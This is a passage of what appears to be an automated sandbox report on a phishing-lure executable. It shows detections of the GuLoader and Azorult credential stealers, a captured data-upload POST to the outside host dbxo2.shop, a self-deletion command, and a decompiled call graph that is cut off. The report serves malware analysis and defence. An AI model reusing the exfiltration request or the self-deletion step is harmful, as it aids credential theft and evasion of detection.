                                                                    Nov 28, 2022 16:37:03.672019005 CET191INData Raw: b9 72 6c 3f 1a a8 27 cf 90 ef 1d d9 06 18 74 c0 db fd 90 c5 38 d8 7d 40 38 1c 11 b0 e0 e8 1e 20 27 c4 75 61 dd df 0c 4b 60 f3 ab f6 2a 28 c6 57 10 48 39 23 86 b5 df 2e f1 35 56 d2 00 d4 0c ef 28 0c a1 56 fd 7a 0e 1e 03 9b f3 79 67 ac ca 30 9f a1
                                                                    Data Ascii: rl?'t8}@8 'uaK`*(WH9#.5V(Vzyg0dg6)7UQp3.Re3x&{7l/De/BiGwT)2PgR4`Tf020{ia25W3{v2UVze!BrY?Q<[?P`e042x/


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.11.2049832104.21.2.680C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Nov 28, 2022 16:37:15.911338091 CET4784OUTPOST /dbx2/index.php HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                    Host: dbxo2.shop
                                                                    Content-Length: 23000
                                                                    Cache-Control: no-cache
                                                                    Nov 28, 2022 16:37:15.911377907 CET4785OUTData Raw: 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37
                                                                    Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&fp2p3pFp3)j;l"&g&f&f&gF;f'q<f)&f&fp5p7p;p0p6p2)q!v'&fp3)0e&f&fBg64.b;4g0x4.a66:l
                                                                    Nov 28, 2022 16:37:15.911427975 CET4787OUTData Raw: ff 51 01 f4 4e 14 f9 49 06 fc 50 1c fe 4d 02 fc 4a 14 eb 44 1b fe 5a 03 e2 50 19 e7 4a 05 e4 50 0f ea 46 07 e4 4c 17 f4 4c 0d e3 57 17 e5 5a 1b fe 4b 11 fc 42 11 e5 42 05 fb 45 1b f4 45 14 f4 4f 14 ef 52 19 e6 4b 10 eb 4f 0d f8 50 12 ff 4a 04 ed
                                                                    Data Ascii: QNIPMJDZPJPFLLWZKBBEEORKOPJR@EQFNULLGER@[QBZV@MYIZDTDGVQQTPSIGOUEFWMIPBHKUPBZRAGS
                                                                    Nov 28, 2022 16:37:15.911478043 CET4795OUTData Raw: 00 e9 47 14 e6 57 02 e5 59 17 f7 4a 03 ff 51 07 f7 51 1e fc 42 00 fa 52 04 e2 4a 00 e6 47 02 e8 48 0c ea 56 03 e0 44 17 e3 46 0f fb 57 14 e8 57 01 e5 5a 19 ff 4f 1f e4 57 10 f8 4c 19 f6 55 0d ec 49 14 fa 51 0f e4 51 01 e1 4a 06 fb 45 19 e1 4f 0f
                                                                    Data Ascii: GWYJQQBRJGHVDFWWZOWLUIQQJEOJVS[M@LDZLJNNWTJLFIPPHQUHAHEVQPVADSRWKREZYGQ@AJLLONQUL
                                                                    Nov 28, 2022 16:37:15.932391882 CET4799OUTData Raw: 55 06 e0 41 1f ec 51 01 e0 55 0d e6 55 1e e7 50 1f fc 53 11 f7 52 17 e5 4c 0d f7 44 1a fa 52 0d e1 49 1e e0 44 06 e1 50 13 fa 45 06 e7 55 1b fe 45 1a ef 5a 19 e7 51 17 fd 42 07 eb 45 02 ff 53 19 e1 4d 0c fe 56 17 e6 49 05 e8 44 07 e8 45 05 f6 42
                                                                    Data Ascii: UAQUUPSRLDRIDPEUEZQBESMVIDEBFZLNKRF@QKHR@OYY@ZHBGAVJRSSSIDJLR@B[IYZMTVJK_HVUUURUQ
                                                                    Nov 28, 2022 16:37:15.932492971 CET4807OUTData Raw: 4d 16 e0 49 1a fc 59 00 eb 54 07 ec 45 11 ef 41 18 e9 42 02 eb 55 16 fd 4e 07 e0 53 1c fb 42 07 f4 46 12 e4 4f 13 ed 5b 01 e4 4b 18 fa 5b 06 ea 59 04 fa 47 1f ff 40 04 fa 4c 14 fa 50 07 e8 4a 12 e3 45 06 ff 51 18 fc 49 10 ed 4a 19 f4 56 12 e0 50
                                                                    Data Ascii: MIYTEABUNSBFO[K[YG@LPJEQIJVPUDKJMRRUWSSFQUPPHDDWMEUHIALBGLNMLKNUPVFBFH[[[AYFWGIDT
                                                                    Nov 28, 2022 16:37:16.141227961 CET4808INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Nov 2022 15:37:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.6.37
                                                                    Vary: User-Agent
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XgjHXZ9xUtOsLy8drbcPt8kEU%2BoPPN22BRTaZS7jcG%2Bxi9V3q7hecWgHhvQVGYwK3pTWroBdtXmtjgQiOv1Vmt94zw8vO92Bo1T%2F9dTI8rUbCvl1gsz7Mwb5fJax"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 77142f128b30b8de-AMS
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                    Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a
                                                                    Data Ascii: 7falseOK
                                                                    Nov 28, 2022 16:37:16.141293049 CET4808INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:1
                                                                    Start time:16:36:12
                                                                    Start date:28/11/2022
                                                                    Path:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    Imagebase:0x400000
                                                                    File size:373461 bytes
                                                                    MD5 hash:9453CDCF8221341D06BAC47B8AB3AA19
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Target ID:5
                                                                    Start time:16:36:42
                                                                    Start date:28/11/2022
                                                                    Path:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    Imagebase:0x400000
                                                                    File size:373461 bytes
                                                                    MD5 hash:9453CDCF8221341D06BAC47B8AB3AA19
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Target ID:6
                                                                    Start time:16:37:16
                                                                    Start date:28/11/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                                                                    Imagebase:0x5f0000
                                                                    File size:236544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:7
                                                                    Start time:16:37:16
                                                                    Start date:28/11/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6e2e30000
                                                                    File size:875008 bytes
                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:8
                                                                    Start time:16:37:17
                                                                    Start date:28/11/2022
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\timeout.exe 3
                                                                    Imagebase:0x880000
                                                                    File size:25088 bytes
                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:7.3%
                                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                                      Signature Coverage:20.8%
                                                                      Total number of Nodes:1020
                                                                      Total number of Limit Nodes:39
                                                                      execution_graph 10783 401941 10784 401943 10783->10784 10789 402c37 10784->10789 10790 402c43 10789->10790 10834 4063d2 10790->10834 10793 401948 10795 405abe 10793->10795 10876 405d89 10795->10876 10798 405ae6 DeleteFileW 10800 401951 10798->10800 10799 405afd 10801 405c28 10799->10801 10890 4063b0 lstrcpynW 10799->10890 10801->10800 10919 4066f3 FindFirstFileW 10801->10919 10803 405b23 10804 405b36 10803->10804 10805 405b29 lstrcatW 10803->10805 10891 405ccd lstrlenW 10804->10891 10808 405b3c 10805->10808 10809 405b4c lstrcatW 10808->10809 10811 405b57 lstrlenW FindFirstFileW 10808->10811 10809->10811 10813 405c1d 10811->10813 10832 405b79 10811->10832 10812 405c46 10922 405c81 lstrlenW CharPrevW 10812->10922 10813->10801 10816 405c00 FindNextFileW 10820 405c16 FindClose 10816->10820 10816->10832 10817 405a76 5 API calls 10819 405c58 10817->10819 10821 405c72 10819->10821 10822 405c5c 10819->10822 10820->10813 10824 405414 24 API calls 10821->10824 10822->10800 10825 405414 24 API calls 10822->10825 10824->10800 10827 405c69 10825->10827 10826 405abe 60 API calls 10826->10832 10829 406176 36 API calls 10827->10829 10828 405414 24 API calls 10828->10816 10830 405c70 10829->10830 10830->10800 10832->10816 10832->10826 10832->10828 10895 4063b0 lstrcpynW 10832->10895 10896 405a76 10832->10896 10904 405414 10832->10904 10915 406176 MoveFileExW 10832->10915 10838 4063df 10834->10838 10835 40662a 10836 402c64 10835->10836 10867 4063b0 lstrcpynW 10835->10867 10836->10793 10851 406644 10836->10851 10838->10835 10839 4065f8 lstrlenW 10838->10839 10841 4063d2 10 API calls 10838->10841 10844 40650d GetSystemDirectoryW 10838->10844 10845 406520 GetWindowsDirectoryW 10838->10845 10846 406644 5 API calls 10838->10846 10847 4063d2 10 API calls 10838->10847 10848 40659b lstrcatW 10838->10848 10849 406554 SHGetSpecialFolderLocation 10838->10849 10860 40627e 10838->10860 10865 4062f7 wsprintfW 10838->10865 10866 4063b0 lstrcpynW 10838->10866 10839->10838 10841->10839 10844->10838 10845->10838 10846->10838 10847->10838 10848->10838 10849->10838 10850 40656c SHGetPathFromIDListW CoTaskMemFree 10849->10850 10850->10838 10852 406651 10851->10852 10854 4066ba CharNextW 10852->10854 10857 4066c7 10852->10857 10858 4066a6 CharNextW 10852->10858 10859 4066b5 CharNextW 10852->10859 10872 405cae 10852->10872 10853 4066cc CharPrevW 10853->10857 10854->10852 10854->10857 10855 4066ed 10855->10793 10857->10853 10857->10855 10858->10852 10859->10854 10868 40621d 10860->10868 10863 4062b2 RegQueryValueExW RegCloseKey 10864 4062e2 10863->10864 10864->10838 10865->10838 10866->10838 10867->10836 10869 40622c 10868->10869 10870 406230 10869->10870 10871 406235 RegOpenKeyExW 10869->10871 10870->10863 10870->10864 10871->10870 10873 405cb4 10872->10873 10874 405cca 10873->10874 10875 405cbb CharNextW 10873->10875 10874->10852 10875->10873 10925 4063b0 lstrcpynW 10876->10925 10878 405d9a 10926 405d2c CharNextW CharNextW 10878->10926 10881 405ade 10881->10798 10881->10799 10882 406644 5 API calls 10888 405db0 10882->10888 10883 405de1 lstrlenW 10884 405dec 10883->10884 10883->10888 10886 405c81 3 API calls 10884->10886 10885 4066f3 2 API calls 10885->10888 10887 405df1 GetFileAttributesW 10886->10887 10887->10881 10888->10881 10888->10883 10888->10885 10889 405ccd 2 API calls 10888->10889 10889->10883 10890->10803 10892 405cdb 10891->10892 10893 405ce1 CharPrevW 10892->10893 10894 405ced 10892->10894 10893->10892 10893->10894 10894->10808 10895->10832 10932 405e7d GetFileAttributesW 10896->10932 10899 405aa3 10899->10832 10900 405a91 RemoveDirectoryW 10902 405a9f 10900->10902 10901 405a99 DeleteFileW 10901->10902 10902->10899 10903 405aaf SetFileAttributesW 10902->10903 10903->10899 10905 4054d1 10904->10905 10906 40542f 10904->10906 10905->10832 10907 40544b lstrlenW 10906->10907 10908 4063d2 17 API calls 10906->10908 10909 405474 10907->10909 10910 405459 lstrlenW 10907->10910 10908->10907 10912 405487 10909->10912 10913 40547a SetWindowTextW 10909->10913 10910->10905 10911 40546b lstrcatW 10910->10911 10911->10909 10912->10905 10914 40548d SendMessageW SendMessageW SendMessageW 10912->10914 10913->10912 10914->10905 10916 406197 10915->10916 10917 40618a 10915->10917 10916->10832 10935 405ffc 10917->10935 10920 405c42 10919->10920 10921 406709 FindClose 10919->10921 10920->10800 10920->10812 10921->10920 10923 405c4c 10922->10923 10924 405c9d lstrcatW 10922->10924 10923->10817 10924->10923 10925->10878 10927 405d49 10926->10927 10929 405d5b 10926->10929 10927->10929 10930 405d56 CharNextW 10927->10930 10928 405d7f 10928->10881 10928->10882 10929->10928 10931 405cae CharNextW 10929->10931 10930->10928 10931->10929 10933 405a82 10932->10933 10934 405e8f SetFileAttributesW 10932->10934 10933->10899 10933->10900 10933->10901 10934->10933 10936 406052 GetShortPathNameW 10935->10936 10937 40602c 10935->10937 10939 406171 10936->10939 10940 406067 10936->10940 10962 405ea2 GetFileAttributesW CreateFileW 10937->10962 10939->10916 10940->10939 10942 40606f wsprintfA 10940->10942 10941 406036 CloseHandle GetShortPathNameW 10941->10939 10943 40604a 10941->10943 10944 4063d2 17 API calls 10942->10944 10943->10936 10943->10939 10945 406097 10944->10945 10963 405ea2 GetFileAttributesW CreateFileW 10945->10963 10947 4060a4 10947->10939 10948 4060b3 GetFileSize GlobalAlloc 10947->10948 10949 4060d5 10948->10949 10950 40616a CloseHandle 10948->10950 10964 405f25 ReadFile 10949->10964 10950->10939 10955 4060f4 lstrcpyA 10958 406116 10955->10958 10956 406108 10957 405e07 4 API calls 10956->10957 10957->10958 10959 40614d SetFilePointer 10958->10959 10971 405f54 WriteFile 10959->10971 10962->10941 10963->10947 10965 405f43 10964->10965 10965->10950 10966 405e07 lstrlenA 10965->10966 10967 405e48 lstrlenA 10966->10967 10968 405e50 10967->10968 10969 405e21 lstrcmpiA 10967->10969 10968->10955 10968->10956 10969->10968 10970 405e3f CharNextA 10969->10970 10970->10967 10972 405f72 GlobalFree 10971->10972 10972->10950 10973 4015c1 10974 402c37 17 API calls 10973->10974 10975 4015c8 10974->10975 10976 405d2c 4 API calls 10975->10976 10991 4015d1 10976->10991 10977 401631 10979 401663 10977->10979 10980 401636 10977->10980 10978 405cae CharNextW 10978->10991 10982 401423 24 API calls 10979->10982 11000 401423 10980->11000 10989 40165b 10982->10989 10987 40164a SetCurrentDirectoryW 10987->10989 10988 401617 GetFileAttributesW 10988->10991 10991->10977 10991->10978 10991->10988 10992 40597d 10991->10992 10995 4058e3 CreateDirectoryW 10991->10995 11004 405960 CreateDirectoryW 10991->11004 11007 40678a GetModuleHandleA 10992->11007 10996 405930 10995->10996 10997 405934 GetLastError 10995->10997 10996->10991 10997->10996 10998 405943 SetFileSecurityW 10997->10998 10998->10996 10999 405959 GetLastError 10998->10999 10999->10996 11001 405414 24 API calls 11000->11001 11002 401431 11001->11002 11003 4063b0 lstrcpynW 11002->11003 11003->10987 11005 405970 11004->11005 11006 405974 GetLastError 11004->11006 11005->10991 11006->11005 11008 4067b0 GetProcAddress 11007->11008 11009 4067a6 11007->11009 11011 405984 11008->11011 11013 40671a GetSystemDirectoryW 11009->11013 11011->10991 11012 4067ac 11012->11008 11012->11011 11014 40673c wsprintfW LoadLibraryExW 11013->11014 11014->11012 11016 100027c2 11017 10002812 11016->11017 11018 100027d2 VirtualProtect 11016->11018 11018->11017 11019 401e43 11027 402c15 11019->11027 11021 401e49 11022 402c15 17 API calls 11021->11022 11023 401e55 11022->11023 11024 401e61 ShowWindow 11023->11024 11025 401e6c EnableWindow 11023->11025 11026 402abf 11024->11026 11025->11026 11028 4063d2 17 API calls 11027->11028 11029 402c2a 11028->11029 11029->11021 11030 402644 11031 402c15 17 API calls 11030->11031 11033 402653 11031->11033 11032 40269d ReadFile 11032->11033 11043 402790 11032->11043 11033->11032 11034 402736 11033->11034 11035 405f25 ReadFile 11033->11035 11037 402792 11033->11037 11038 4026dd MultiByteToWideChar 11033->11038 11040 402703 SetFilePointer MultiByteToWideChar 11033->11040 11041 4027a3 11033->11041 11033->11043 11034->11033 11034->11043 11044 405f83 SetFilePointer 11034->11044 11035->11033 11053 4062f7 wsprintfW 11037->11053 11038->11033 11040->11033 11042 4027c4 SetFilePointer 11041->11042 11041->11043 11042->11043 11045 405f9f 11044->11045 11050 405fbb 11044->11050 11046 405f25 ReadFile 11045->11046 11047 405fab 11046->11047 11048 405fc4 SetFilePointer 11047->11048 11049 405fec SetFilePointer 11047->11049 11047->11050 11048->11049 11051 405fcf 11048->11051 11049->11050 11050->11034 11052 405f54 WriteFile 11051->11052 11052->11050 11053->11043 11054 4145612 11056 4145617 11054->11056 11057 4145685 11056->11057 11057->11057 11058 414577d NtResumeThread 11057->11058 11059 41457ed 11058->11059 11060 402348 11061 402c37 17 API calls 11060->11061 11062 402357 11061->11062 11063 402c37 17 API calls 11062->11063 11064 402360 11063->11064 11065 402c37 17 API calls 11064->11065 11066 40236a GetPrivateProfileStringW 11065->11066 11067 405388 11068 405398 11067->11068 11069 4053ac 11067->11069 11070 40539e 11068->11070 11080 4053f5 11068->11080 11071 4053b4 IsWindowVisible 11069->11071 11077 4053d4 11069->11077 11081 404391 11070->11081 11074 4053c1 11071->11074 11071->11080 11072 4053fa CallWindowProcW 11075 4053a8 11072->11075 11084 404cde SendMessageW 11074->11084 11077->11072 11089 404d5e 11077->11089 11080->11072 11082 4043a9 11081->11082 11083 40439a SendMessageW 11081->11083 11082->11075 11083->11082 11085 404d01 GetMessagePos ScreenToClient SendMessageW 11084->11085 11086 404d3d SendMessageW 11084->11086 11087 404d35 11085->11087 11088 404d3a 11085->11088 11086->11087 11087->11077 11088->11086 11098 4063b0 lstrcpynW 11089->11098 11091 404d71 11099 4062f7 wsprintfW 11091->11099 11093 404d7b 11100 40140b 11093->11100 11097 404d8b 11097->11080 11098->11091 11099->11093 11104 401389 11100->11104 11103 4063b0 lstrcpynW 11103->11097 11106 401390 11104->11106 11105 4013fe 11105->11103 11106->11105 11107 4013cb MulDiv SendMessageW 11106->11107 11107->11106 11108 402388 11109 402390 11108->11109 11110 4023bb 11108->11110 11124 402c77 11109->11124 11112 402c37 17 API calls 11110->11112 11114 4023c2 11112->11114 11120 402cf5 11114->11120 11116 4023a1 11118 402c37 17 API calls 11116->11118 11117 4023cf 11119 4023a8 RegDeleteValueW RegCloseKey 11118->11119 11119->11117 11121 402d0b 11120->11121 11122 402d21 11121->11122 11129 402d2a 11121->11129 11122->11117 11125 402c37 17 API calls 11124->11125 11126 402c8e 11125->11126 11127 40621d RegOpenKeyExW 11126->11127 11128 402397 11127->11128 11128->11116 11128->11117 11130 40621d RegOpenKeyExW 11129->11130 11131 402d58 11130->11131 11132 402dd0 11131->11132 11134 402d5c 11131->11134 11132->11122 11133 402d7e RegEnumKeyW 11133->11134 11135 402d95 RegCloseKey 11133->11135 11134->11133 11134->11135 11136 402db6 RegCloseKey 11134->11136 11138 402d2a 6 API calls 11134->11138 11137 40678a 5 API calls 11135->11137 11136->11132 11139 402da5 11137->11139 11138->11134 11140 402dc4 RegDeleteKeyW 11139->11140 11141 402da9 11139->11141 11140->11132 11141->11132 11142 403489 SetErrorMode GetVersion 11143 4034c8 11142->11143 11144 4034ce 11142->11144 11145 40678a 5 API calls 11143->11145 11146 40671a 3 API calls 11144->11146 11145->11144 11147 4034e4 lstrlenA 11146->11147 11147->11144 11148 4034f4 11147->11148 11149 40678a 5 API calls 11148->11149 11150 4034fb 11149->11150 11151 40678a 5 API calls 11150->11151 11152 403502 11151->11152 11153 40678a 5 API calls 11152->11153 11154 40350e #17 OleInitialize SHGetFileInfoW 11153->11154 11233 4063b0 lstrcpynW 11154->11233 11157 40355a GetCommandLineW 11234 4063b0 lstrcpynW 11157->11234 11159 40356c GetModuleHandleW 11160 403584 11159->11160 11161 405cae CharNextW 11160->11161 11162 403593 CharNextW 11161->11162 11163 4036bd GetTempPathW 11162->11163 11174 4035ac 11162->11174 11235 403458 11163->11235 11165 4036d5 11166 4036d9 GetWindowsDirectoryW lstrcatW 11165->11166 11167 40372f DeleteFileW 11165->11167 11168 403458 12 API calls 11166->11168 11245 402f14 GetTickCount GetModuleFileNameW 11167->11245 11172 4036f5 11168->11172 11169 405cae CharNextW 11169->11174 11171 403743 11173 4037f6 11171->11173 11177 4037e6 11171->11177 11181 405cae CharNextW 11171->11181 11172->11167 11175 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 11172->11175 11334 4039cc 11173->11334 11174->11169 11176 4036a6 11174->11176 11179 4036a8 11174->11179 11180 403458 12 API calls 11175->11180 11176->11163 11275 403abe 11177->11275 11331 4063b0 lstrcpynW 11179->11331 11185 403727 11180->11185 11198 403762 11181->11198 11185->11167 11185->11173 11186 403930 11189 4039b4 ExitProcess 11186->11189 11190 403938 GetCurrentProcess OpenProcessToken 11186->11190 11187 403810 11343 405a12 11187->11343 11195 403950 LookupPrivilegeValueW AdjustTokenPrivileges 11190->11195 11196 403984 11190->11196 11192 4037c0 11199 405d89 18 API calls 11192->11199 11193 403826 11200 40597d 5 API calls 11193->11200 11195->11196 11197 40678a 5 API calls 11196->11197 11201 40398b 11197->11201 11198->11192 11198->11193 11202 4037cc 11199->11202 11203 40382b lstrcatW 11200->11203 11204 4039a0 ExitWindowsEx 11201->11204 11208 4039ad 11201->11208 11202->11173 11332 4063b0 lstrcpynW 11202->11332 11205 403847 lstrcatW lstrcmpiW 11203->11205 11206 40383c lstrcatW 11203->11206 11204->11189 11204->11208 11205->11173 11207 403863 11205->11207 11206->11205 11211 403868 11207->11211 11212 40386f 11207->11212 11213 40140b 2 API calls 11208->11213 11210 4037db 11333 4063b0 lstrcpynW 11210->11333 11215 4058e3 4 API calls 11211->11215 11216 405960 2 API calls 11212->11216 11213->11189 11217 40386d 11215->11217 11218 403874 SetCurrentDirectoryW 11216->11218 11217->11218 11219 403884 11218->11219 11220 40388f 11218->11220 11347 4063b0 lstrcpynW 11219->11347 11348 4063b0 lstrcpynW 11220->11348 11223 4063d2 17 API calls 11224 4038ce DeleteFileW 11223->11224 11225 4038db CopyFileW 11224->11225 11230 40389d 11224->11230 11225->11230 11226 403924 11228 406176 36 API calls 11226->11228 11227 406176 36 API calls 11227->11230 11228->11173 11229 4063d2 17 API calls 11229->11230 11230->11223 11230->11226 11230->11227 11230->11229 11232 40390f CloseHandle 11230->11232 11349 405995 CreateProcessW 11230->11349 11232->11230 11233->11157 11234->11159 11236 406644 5 API calls 11235->11236 11237 403464 11236->11237 11238 40346e 11237->11238 11239 405c81 3 API calls 11237->11239 11238->11165 11240 403476 11239->11240 11241 405960 2 API calls 11240->11241 11242 40347c 11241->11242 11352 405ed1 11242->11352 11356 405ea2 GetFileAttributesW CreateFileW 11245->11356 11247 402f57 11274 402f64 11247->11274 11357 4063b0 lstrcpynW 11247->11357 11249 402f7a 11250 405ccd 2 API calls 11249->11250 11251 402f80 11250->11251 11358 4063b0 lstrcpynW 11251->11358 11253 402f8b GetFileSize 11254 40308c 11253->11254 11272 402fa2 11253->11272 11359 402e72 11254->11359 11258 4030cf GlobalAlloc 11262 4030e6 11258->11262 11259 403127 11260 402e72 32 API calls 11259->11260 11260->11274 11264 405ed1 2 API calls 11262->11264 11263 4030b0 11265 40342b ReadFile 11263->11265 11267 4030f7 CreateFileW 11264->11267 11268 4030bb 11265->11268 11266 402e72 32 API calls 11266->11272 11269 403131 11267->11269 11267->11274 11268->11258 11268->11274 11374 403441 SetFilePointer 11269->11374 11271 40313f 11375 4031ba 11271->11375 11272->11254 11272->11259 11272->11266 11272->11274 11390 40342b 11272->11390 11274->11171 11276 40678a 5 API calls 11275->11276 11277 403ad2 11276->11277 11278 403ad8 GetUserDefaultUILanguage 11277->11278 11279 403aea 11277->11279 11422 4062f7 wsprintfW 11278->11422 11281 40627e 3 API calls 11279->11281 11283 403b1a 11281->11283 11282 403ae8 11423 403d94 11282->11423 11284 403b39 lstrcatW 11283->11284 11286 40627e 3 API calls 11283->11286 11284->11282 11286->11284 11288 405d89 18 API calls 11289 403b6b 11288->11289 11290 403bff 11289->11290 11292 40627e 3 API calls 11289->11292 11291 405d89 18 API calls 11290->11291 11293 403c05 11291->11293 11294 403b9d 11292->11294 11295 403c15 LoadImageW 11293->11295 11296 4063d2 17 API calls 11293->11296 11294->11290 11300 403bbe lstrlenW 11294->11300 11304 405cae CharNextW 11294->11304 11297 403cbb 11295->11297 11298 403c3c RegisterClassW 11295->11298 11296->11295 11299 40140b 2 API calls 11297->11299 11301 403c72 SystemParametersInfoW CreateWindowExW 11298->11301 11302 403cc5 11298->11302 11303 403cc1 11299->11303 11305 403bf2 11300->11305 11306 403bcc lstrcmpiW 11300->11306 11301->11297 11302->11173 11303->11302 11311 403d94 18 API calls 11303->11311 11308 403bbb 11304->11308 11307 405c81 3 API calls 11305->11307 11306->11305 11309 403bdc GetFileAttributesW 11306->11309 11312 403bf8 11307->11312 11308->11300 11310 403be8 11309->11310 11310->11305 11313 405ccd 2 API calls 11310->11313 11314 403cd2 11311->11314 11431 4063b0 lstrcpynW 11312->11431 11313->11305 11316 403d61 11314->11316 11317 403cde ShowWindow 11314->11317 11432 4054e7 OleInitialize 11316->11432 11319 40671a 3 API calls 11317->11319 11321 403cf6 11319->11321 11320 403d67 11322 403d83 11320->11322 11323 403d6b 11320->11323 11324 403d04 GetClassInfoW 11321->11324 11326 40671a 3 API calls 11321->11326 11325 40140b 2 API calls 11322->11325 11323->11302 11329 40140b 2 API calls 11323->11329 11327 403d18 GetClassInfoW RegisterClassW 11324->11327 11328 403d2e DialogBoxParamW 11324->11328 11325->11302 11326->11324 11327->11328 11330 40140b 2 API calls 11328->11330 11329->11302 11330->11302 11331->11176 11332->11210 11333->11177 11335 4039e7 11334->11335 11336 4039dd CloseHandle 11334->11336 11337 4039f1 CloseHandle 11335->11337 11338 4039fb 11335->11338 11336->11335 11337->11338 11443 403a29 11338->11443 11341 405abe 67 API calls 11342 4037ff OleUninitialize 11341->11342 11342->11186 11342->11187 11344 405a27 11343->11344 11345 40381e ExitProcess 11344->11345 11346 405a3b MessageBoxIndirectW 11344->11346 11346->11345 11347->11220 11348->11230 11350 4059d4 11349->11350 11351 4059c8 CloseHandle 11349->11351 11350->11230 11351->11350 11353 405ede GetTickCount GetTempFileNameW 11352->11353 11354 403487 11353->11354 11355 405f14 11353->11355 11354->11165 11355->11353 11355->11354 11356->11247 11357->11249 11358->11253 11360 402e83 11359->11360 11361 402e9b 11359->11361 11362 402e93 11360->11362 11363 402e8c DestroyWindow 11360->11363 11364 402ea3 11361->11364 11365 402eab GetTickCount 11361->11365 11362->11258 11362->11274 11393 403441 SetFilePointer 11362->11393 11363->11362 11394 4067c6 11364->11394 11365->11362 11367 402eb9 11365->11367 11368 402ec1 11367->11368 11369 402eee CreateDialogParamW ShowWindow 11367->11369 11368->11362 11398 402e56 11368->11398 11369->11362 11371 402ecf wsprintfW 11372 405414 24 API calls 11371->11372 11373 402eec 11372->11373 11373->11362 11374->11271 11376 4031e5 11375->11376 11377 4031c9 SetFilePointer 11375->11377 11401 4032c2 GetTickCount 11376->11401 11377->11376 11380 403282 11380->11274 11381 405f25 ReadFile 11382 403205 11381->11382 11382->11380 11383 4032c2 42 API calls 11382->11383 11384 40321c 11383->11384 11384->11380 11385 403288 ReadFile 11384->11385 11387 40322b 11384->11387 11385->11380 11387->11380 11388 405f25 ReadFile 11387->11388 11389 405f54 WriteFile 11387->11389 11388->11387 11389->11387 11391 